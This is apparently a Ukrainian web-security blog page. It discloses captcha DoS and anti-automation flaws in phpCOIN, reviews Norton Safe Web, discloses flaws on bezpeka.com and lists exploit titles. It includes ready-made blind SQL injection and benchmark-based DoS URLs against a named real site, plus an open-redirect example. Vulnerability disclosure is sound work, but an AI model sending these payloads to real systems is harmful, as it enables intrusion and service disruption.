Websecurity - Веб безпека

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі phpCOIN. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше.

DoS:

http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі phpCOIN 1.6.5 та попередні версії.

Продовжуючи тему антивірусів для сайтів, розповім вам про ще один подібний сервіс, який я знайшов декілька днів тому. Це Norton Safe Web від Symantec. Це ще один конкурент моїй Web VDS.

Компанія Symantec відомий розробник антивірусних продуктів, тому подібний публічний сервіс від даної компанії мав коли-небудь з’явитися. Відповідно до знайденої мною інформації - даний сервіс Symantec запустила ще в 2008 році (у вигляді бета версії і зараз це вже офіційна версія сервісу). Це лише я натрапив на цей сервіс нещодавно .

На відміну від інших антивірусних компаній, таких як McAfee (що надає свою технологію Yahoo) та Sophos (що надає свою технологію Yandex), Symantec не стала надавати іншим компаніям власну технологію по виявленню вірусів на сайтах. І зробила власний веб сервіс, подібно до Google, який в минулому році зробив свій Safe Browsing публічним (при тому, що Гугл розробив свою технологію ще в 2006 році).

Щоб скористатися сервісом Norton Safe Web, потрібно зайти на даний сайт і вказати URL в рядку пошуку, або напряму зайти на сторінку звіту про сайт (вказавши URL):

http://safeweb.norton.com/report/show?url=site.com

Можете подитивитися на роботу сервіса на прикладі norton.com:

http://safeweb.norton.com/report/show?url=norton.com

Зазначу, що в Safe Web недостатньо велика база перевірених сайтів - вона на порядок менша ніж у Safe Browsing Гугла.

30.09.2009

У лютому, 06.02.2009, я знайшов SQL DB Structure Extraction, SQL Injection, Denial of Service та Redirector уразливості на секюріті сайті http://bezpeka.com. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на bezpeka.com.

Детальна інформація про уразливості з’явиться пізніше.

01.04.2010

Раніше сайт працював на домені bezpeka.com, а зараз лише на www.bezpeka.com.

SQL DB Structure Extraction:

http://www.bezpeka.com/ru/redirect/

http://www.bezpeka.com/ru/redirect/?bid=’

http://www.bezpeka.com/ru/redirect/?bcat=’

SQL Injection (сліпа):

http://www.bezpeka.com/ru/redirect/?bid=-1%20or%20if(version()=5.1,benchmark(500000,md5(now())),1)%23
http://www.bezpeka.com/ru/redirect/?bid=1&bcat=-1%20or%20if(version()=5.1,benchmark(500000,md5(now())),1)

DoS (через SQL Injection):

http://www.bezpeka.com/ru/redirect/?bid=1%20and%20benchmark(1000000,md5(now()))%23
http://www.bezpeka.com/ru/redirect/?bid=1&bcat=1%20and%20benchmark(1000000,md5(now()))%23

Redirector:

http://www.bezpeka.com/ru/redirect/?url=http://websecurity.com.ua

З даних уразливостей виправлені лише перша та третя SQL DB Structure Extraction та Redirector (і то неякісно). А всі інші уразливості досі не виправлені.

Остання уразливість знову працює при невеликій зміні URL запиту:

Redirector:

http://www.bezpeka.com/ru/redirect/?url=http://websecurity.com.ua&bid=1&bcat=1

В даній добірці експлоіти в веб додатках:

• SolarWinds TFTP Server <=9.2.0.111 Remote DoS Exploit (деталі)
• Modern Script <= 5.0 (index.php s) SQL Injection Vulnerability (деталі)
• Apple iPhone 2.2.1/3.x (MobileSafari) Crash & Reboot Exploit (loop) (деталі)
• BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities (деталі)
• Re-Script v.0.99 Beta ( listings.php op ) SQL Injection Vulnerability (деталі)
• Basic PHP Events Lister 2 Reset Admin Pass/Add Admin Vulns (деталі)
• SEO-CMS 1.3 (body.php) Remote File Inclusion Vulnerability (деталі)
• osCommerce Online Merchant 2.2 RC2a Code Execution Exploit (деталі)
• Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability (деталі)
• Joomla Component Agora 3.0.0b (com_agora) LFI Vulnerability (деталі)